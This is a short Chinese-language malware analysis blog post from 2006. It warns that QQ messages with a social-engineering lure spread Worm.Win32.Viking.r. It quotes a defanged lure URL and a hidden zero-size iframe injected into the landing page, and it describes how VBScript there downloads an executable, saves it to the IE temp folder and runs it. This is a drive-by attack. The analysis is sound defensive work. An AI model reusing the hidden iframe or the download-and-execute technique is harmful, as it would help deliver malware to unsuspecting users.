endurer 原创
2006-09-03 第1版
小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的Worm.Win32.Viking.r
一文中的网址变了。打开QQ好友的对话框就会自动发出的信息为:
/----------
我有个女同学参加2006,大学生网络风采评选,Q-Zone空间上有她参选照片,帮忙游览下给他增加人气,谢谢……
hxxp://Q-Zone.QQ***.C0M.%37***%76%***34%2E%63%6E/Q-zone/Cgi_bin/Entry-Cgiuin=**98393212
----------/
该网页首部中有:
/----------
<iframe src=hxxp://web****2.%33%39%63***%6F%6D%***2E%6F%72%67/ms/mm.htm width=0 height=0></iframe>
----------/
hxxp://web****2.%33%39%63***%6F%6D%***2E%6F%72%67/ms/mm.htm中有 protected by HTMLShip XP(Unregistered Version) 的脚本代码,脚本程序共有3部分(原来脚本程序共有2部分)。
第1、2部分脚本程序 使用的是JavaScript,其功能是阻止用户选择网页内容、屏蔽右键关键菜单等,以及第二部分脚本程序正确运行所需要的数据。
第3部分脚本程序 使用的是VBScript,其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 把某个网站(这里不给出网址了)的MS目录中的文件 HOU2.EXE (原来下载的是 HOU1.EXE)保存为 IE临时文件夹中的 g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
Kaspersky 将 HOU2.EXE 报为 Worm.Win32.Viking.r。
网页中部同样为加密的脚本代码,脚本解密后为:
/----------
<iframe width="760" height="1830" src="hxxp://u.***7town.com/html/760_1830/ly1/index.html?uid=15407&a=&b=&c=&d=&e=&f=" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>
----------/
